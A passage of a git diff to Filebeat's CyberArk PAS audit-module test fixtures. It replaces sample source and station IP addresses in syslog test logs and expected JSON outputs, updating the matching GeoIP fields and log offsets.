         "cyberarkpas.audit.timestamp": "Mar 11 10:02:57",
         "destination.address": "10.0.1.20",
         "destination.ip": "10.0.1.20",
@@ -472,7 +463,7 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 6097,
+        "log.offset": 6094,
         "log.syslog.priority": "5",
         "network.direction": "inbound",
         "observer.hostname": "VAULT",
@@ -481,22 +472,20 @@
         "observer.version": "11.7.0000",
         "related.ip": [
             "10.0.1.20",
-            "35.192.121.42"
+            "67.43.156.12"
         ],
         "related.user": [
             "Administrator",
             "PVWAGWUser"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "35.192.121.42",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 38.6583,
-        "source.geo.location.lon": -77.2481,
-        "source.geo.region_iso_code": "US-VA",
-        "source.geo.region_name": "Virginia",
-        "source.ip": "35.192.121.42",
+        "source.address": "67.43.156.12",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.12",
         "source.user.name": "PVWAGWUser",
         "tags": [
             "cyberarkpas.audit",
@@ -508,23 +497,26 @@
         "@timestamp": "2021-03-14T13:49:35.000Z",
         "cyberarkpas.audit.action": "Full Gateway Connection",
         "cyberarkpas.audit.desc": "Full Gateway Connection",
-        "cyberarkpas.audit.gateway_station": "34.71.250.247",
+        "cyberarkpas.audit.gateway_station": "81.2.69.143",
         "cyberarkpas.audit.iso_timestamp": "2021-03-14T13:49:35Z",
         "cyberarkpas.audit.issuer": "Administrator",
         "cyberarkpas.audit.message": "Full Gateway Connection",
-        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 06:49:35</Timestamp>\n    <IsoTimestamp>2021-03-14T13:49:35Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>19</MessageID>\n    <Desc>Full Gateway Connection</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Full Gateway Connection</Action>\n    <SourceUser>PSMPGW_SSH</SourceUser>\n    <TargetUser></TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>81.32.170.205</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Full Gateway Connection</Message>\n    <GatewayStation>34.71.250.247</GatewayStation>\n  </audit_record>\n\n</syslog>",
+        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 06:49:35</Timestamp>\n    <IsoTimestamp>2021-03-14T13:49:35Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>19</MessageID>\n    <Desc>Full Gateway Connection</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Full Gateway Connection</Action>\n    <SourceUser>PSMPGW_SSH</SourceUser>\n    <TargetUser></TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>67.43.156.14</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Full Gateway Connection</Message>\n    <GatewayStation>81.2.69.143</GatewayStation>\n  </audit_record>\n\n</syslog>",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.severity": "Info",
         "cyberarkpas.audit.source_user": "PSMPGW_SSH",
-        "cyberarkpas.audit.station": "81.32.170.205",
+        "cyberarkpas.audit.station": "67.43.156.14",
         "cyberarkpas.audit.timestamp": "Mar 14 06:49:35",
-        "destination.address": "34.71.250.247",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "34.71.250.247",
+        "destination.address": "81.2.69.143",
+        "destination.geo.city_name": "London",
+        "destination.geo.continent_name": "Europe",
+        "destination.geo.country_iso_code": "GB",
+        "destination.geo.country_name": "United Kingdom",
+        "destination.geo.location.lat": 51.5142,
+        "destination.geo.location.lon": -0.0931,
+        "destination.geo.region_iso_code": "GB-ENG",
+        "destination.geo.region_name": "England",
+        "destination.ip": "81.2.69.143",
         "destination.user.name": "Administrator",
         "event.action": "full gateway connection",
         "event.category": [
@@ -543,7 +535,7 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 7607,
+        "log.offset": 7602,
         "log.syslog.priority": "5",
         "network.direction": "external",
         "observer.hostname": "VAULT",
@@ -551,24 +543,21 @@
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "34.71.250.247",
-            "81.32.170.205"
+            "67.43.156.14",
+            "81.2.69.143"
         ],
         "related.user": [
             "Administrator",
             "PSMPGW_SSH"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "source.user.name": "PSMPGW_SSH",
         "tags": [
             "cyberarkpas.audit",
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/22_cpm_verify_password.log-expected.json b/x-pack/filebeat/module/cyberarkpas/audit/test/22_cpm_verify_password.log-expected.json
index 90d668dbefba..043f0882d907 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/22_cpm_verify_password.log-expected.json
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/22_cpm_verify_password.log-expected.json
@@ -95,11 +95,6 @@
         "cyberarkpas.audit.station": "10.0.1.20",
         "cyberarkpas.audit.timestamp": "Mar 15 03:22:44",
         "destination.address": "34.123.103.115",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "34.123.103.115",
         "destination.user.name": "testark",
         "event.action": "cpm verify password",
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/23_action_on_closed_safe.log b/x-pack/filebeat/module/cyberarkpas/audit/test/23_action_on_closed_safe.log
index 51629665b2bf..b9b397d22bd5 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/23_action_on_closed_safe.log
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/23_action_on_closed_safe.log
@@ -1,3 +1,3 @@
-<7>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"23","Desc":"Action On Closed Safe","Severity":"Error","Issuer":"Administrator","Action":"Action On Closed Safe","SourceUser":"","TargetUser":"","Safe":"PSMPConf","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Action On Closed Safe","GatewayStation":""}}}
+<7>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"23","Desc":"Action On Closed Safe","Severity":"Error","Issuer":"Administrator","Action":"Action On Closed Safe","SourceUser":"","TargetUser":"","Safe":"PSMPConf","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Action On Closed Safe","GatewayStation":""}}}
 <7>1 2021-03-14T12:07:27Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 05:07:27</Timestamp>\n    <IsoTimestamp>2021-03-14T12:07:27Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>23</MessageID>\n    <Desc>Action On Closed Safe</Desc>\n    <Severity>Error</Severity>\n    <Issuer>PasswordManager</Issuer>\n    <Action>Action On Closed Safe</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>AccountsFeedADAccounts</Safe>\n    <File></File>\n    <Station>10.0.1.20</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Action On Closed Safe</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:07:27","IsoTimestamp":"2021-03-14T12:07:27Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"23","Desc":"Action On Closed Safe","Severity":"Error","Issuer":"PasswordManager","Action":"Action On Closed Safe","SourceUser":"","TargetUser":"","Safe":"AccountsFeedADAccounts","File":"","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Action On Closed Safe","GatewayStation":""}}}
-<7>1 2021-03-14T12:57:16Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 05:57:16</Timestamp>\n    <IsoTimestamp>2021-03-14T12:57:16Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>23</MessageID>\n    <Desc>Action On Closed Safe</Desc>\n    <Severity>Error</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Action On Closed Safe</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSMPConf</Safe>\n    <File></File>\n    <Station>34.71.250.247</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Action On Closed Safe</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:16","IsoTimestamp":"2021-03-14T12:57:16Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"23","Desc":"Action On Closed Safe","Severity":"Error","Issuer":"Administrator","Action":"Action On Closed Safe","SourceUser":"","TargetUser":"","Safe":"PSMPConf","File":"","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Action On Closed Safe","GatewayStation":""}}}
+<7>1 2021-03-14T12:57:16Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 05:57:16</Timestamp>\n    <IsoTimestamp>2021-03-14T12:57:16Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>23</MessageID>\n    <Desc>Action On Closed Safe</Desc>\n    <Severity>Error</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Action On Closed Safe</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSMPConf</Safe>\n    <File></File>\n    <Station>81.2.69.143</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Action On Closed Safe</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:16","IsoTimestamp":"2021-03-14T12:57:16Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"23","Desc":"Action On Closed Safe","Severity":"Error","Issuer":"Administrator","Action":"Action On Closed Safe","SourceUser":"","TargetUser":"","Safe":"PSMPConf","File":"","Station":"81.2.69.143","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Action On Closed Safe","GatewayStation":""}}}
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/23_action_on_closed_safe.log-expected.json b/x-pack/filebeat/module/cyberarkpas/audit/test/23_action_on_closed_safe.log-expected.json
index a8ef4bc0bdbe..37a3ec8dd800 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/23_action_on_closed_safe.log-expected.json
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/23_action_on_closed_safe.log-expected.json
@@ -9,7 +9,7 @@
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.safe": "PSMPConf",
         "cyberarkpas.audit.severity": "Error",
-        "cyberarkpas.audit.station": "81.32.170.205",
+        "cyberarkpas.audit.station": "67.43.156.14",
         "cyberarkpas.audit.timestamp": "Mar 10 01:11:20",
         "event.action": "action on closed safe",
         "event.code": "23",
@@ -29,19 +29,16 @@
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "81.32.170.205"
+            "67.43.156.14"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
@@ -71,7 +68,7 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 599,
+        "log.offset": 598,
         "log.syslog.priority": "7",
         "observer.hostname": "VAULT",
         "observer.product": "Vault",
@@ -95,11 +92,11 @@
         "cyberarkpas.audit.iso_timestamp": "2021-03-14T12:57:16Z",
         "cyberarkpas.audit.issuer": "Administrator",
         "cyberarkpas.audit.message": "Action On Closed Safe",
-        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 05:57:16</Timestamp>\n    <IsoTimestamp>2021-03-14T12:57:16Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>23</MessageID>\n    <Desc>Action On Closed Safe</Desc>\n    <Severity>Error</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Action On Closed Safe</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSMPConf</Safe>\n    <File></File>\n    <Station>34.71.250.247</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Action On Closed Safe</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>",
+        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 05:57:16</Timestamp>\n    <IsoTimestamp>2021-03-14T12:57:16Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>23</MessageID>\n    <Desc>Action On Closed Safe</Desc>\n    <Severity>Error</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Action On Closed Safe</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSMPConf</Safe>\n    <File></File>\n    <Station>81.2.69.143</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Action On Closed Safe</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.safe": "PSMPConf",
         "cyberarkpas.audit.severity": "Error",
-        "cyberarkpas.audit.station": "34.71.250.247",
+        "cyberarkpas.audit.station": "81.2.69.143",
         "cyberarkpas.audit.timestamp": "Mar 14 05:57:16",
         "event.action": "action on closed safe",
         "event.code": "23",
@@ -112,23 +109,26 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 2101,
+        "log.offset": 2100,
         "log.syslog.priority": "7",
         "observer.hostname": "VAULT",
         "observer.product": "Vault",
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "34.71.250.247"
+            "81.2.69.143"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "34.71.250.247",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 37.751,
-        "source.geo.location.lon": -97.822,
-        "source.ip": "34.71.250.247",
+        "source.address": "81.2.69.143",
+        "source.geo.city_name": "London",
+        "source.geo.continent_name": "Europe",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.143",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/259_add_update_group.log b/x-pack/filebeat/module/cyberarkpas/audit/test/259_add_update_group.log
index 7284820d8e4b..4be3af4b8514 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/259_add_update_group.log
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/259_add_update_group.log
@@ -1,4 +1,4 @@
-<5>1 2021-03-10T09:11:21Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:21","IsoTimestamp":"2021-03-10T09:11:21Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"259","Desc":"Add/Update Group","Severity":"Info","Issuer":"Administrator","Action":"Add/Update Group","SourceUser":"PSMMaster","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add/Update Group","GatewayStation":""}}}
-<5>1 2021-03-10T09:11:21Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:21","IsoTimestamp":"2021-03-10T09:11:21Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"259","Desc":"Add/Update Group","Severity":"Info","Issuer":"Administrator","Action":"Add/Update Group","SourceUser":"PSMAppUsers","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add/Update Group","GatewayStation":""}}}
-<5>1 2021-03-10T09:11:35Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:35","IsoTimestamp":"2021-03-10T09:11:35Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"259","Desc":"Add/Update Group","Severity":"Info","Issuer":"Administrator","Action":"Add/Update Group","SourceUser":"PSMP_ADB_AppUsers","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add/Update Group","GatewayStation":""}}}
-<5>1 2021-03-10T17:59:29Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:59:29","IsoTimestamp":"2021-03-10T17:59:29Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"259","Desc":"Add/Update Group","Severity":"Info","Issuer":"Administrator","Action":"Add/Update Group","SourceUser":"PSMLiveSessionTerminators","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add/Update Group","GatewayStation":""}}}
+<5>1 2021-03-10T09:11:21Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:21","IsoTimestamp":"2021-03-10T09:11:21Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"259","Desc":"Add/Update Group","Severity":"Info","Issuer":"Administrator","Action":"Add/Update Group","SourceUser":"PSMMaster","TargetUser":"","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add/Update Group","GatewayStation":""}}}
+<5>1 2021-03-10T09:11:21Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:21","IsoTimestamp":"2021-03-10T09:11:21Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"259","Desc":"Add/Update Group","Severity":"Info","Issuer":"Administrator","Action":"Add/Update Group","SourceUser":"PSMAppUsers","TargetUser":"","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add/Update Group","GatewayStation":""}}}
+<5>1 2021-03-10T09:11:35Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:35","IsoTimestamp":"2021-03-10T09:11:35Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"259","Desc":"Add/Update Group","Severity":"Info","Issuer":"Administrator","Action":"Add/Update Group","SourceUser":"PSMP_ADB_AppUsers","TargetUser":"","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add/Update Group","GatewayStation":""}}}
+<5>1 2021-03-10T17:59:29Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:59:29","IsoTimestamp":"2021-03-10T17:59:29Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"259","Desc":"Add/Update Group","Severity":"Info","Issuer":"Administrator","Action":"Add/Update Group","SourceUser":"PSMLiveSessionTerminators","TargetUser":"","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add/Update Group","GatewayStation":""}}}
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/259_add_update_group.log-expected.json b/x-pack/filebeat/module/cyberarkpas/audit/test/259_add_update_group.log-expected.json
index 74637ba020f1..6d4a10d3acd8 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/259_add_update_group.log-expected.json
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/259_add_update_group.log-expected.json
@@ -9,7 +9,7 @@
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.severity": "Info",
         "cyberarkpas.audit.source_user": "PSMMaster",
-        "cyberarkpas.audit.station": "81.32.170.205",
+        "cyberarkpas.audit.station": "67.43.156.14",
         "cyberarkpas.audit.timestamp": "Mar 10 01:11:21",
         "event.action": "add/update group",
         "event.code": "259",
@@ -28,19 +28,16 @@
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "81.32.170.205"
+            "67.43.156.14"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
@@ -56,7 +53,7 @@
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.severity": "Info",
         "cyberarkpas.audit.source_user": "PSMAppUsers",
-        "cyberarkpas.audit.station": "81.32.170.205",
+        "cyberarkpas.audit.station": "67.43.156.14",
         "cyberarkpas.audit.timestamp": "Mar 10 01:11:21",
         "event.action": "add/update group",
         "event.code": "259",
@@ -68,26 +65,23 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 585,
+        "log.offset": 584,
         "log.syslog.priority": "5",
         "observer.hostname": "VAULT",
         "observer.product": "Vault",
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "81.32.170.205"
+            "67.43.156.14"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
@@ -103,7 +97,7 @@
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.severity": "Info",
         "cyberarkpas.audit.source_user": "PSMP_ADB_AppUsers",
-        "cyberarkpas.audit.station": "81.32.170.205",
+        "cyberarkpas.audit.station": "67.43.156.14",
         "cyberarkpas.audit.timestamp": "Mar 10 01:11:35",
         "event.action": "add/update group",
         "event.code": "259",
@@ -115,26 +109,23 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 1172,
+        "log.offset": 1170,
         "log.syslog.priority": "5",
         "observer.hostname": "VAULT",
         "observer.product": "Vault",
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "81.32.170.205"
+            "67.43.156.14"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
@@ -150,7 +141,7 @@
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.severity": "Info",
         "cyberarkpas.audit.source_user": "PSMLiveSessionTerminators",
-        "cyberarkpas.audit.station": "81.32.170.205",
+        "cyberarkpas.audit.station": "67.43.156.14",
         "cyberarkpas.audit.timestamp": "Mar 10 09:59:29",
         "event.action": "add/update group",
         "event.code": "259",
@@ -162,26 +153,23 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 1765,
+        "log.offset": 1762,
         "log.syslog.priority": "5",
         "observer.hostname": "VAULT",
         "observer.product": "Vault",
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "81.32.170.205"
+            "67.43.156.14"
         ],
         "service.type": "cyberarkpas",
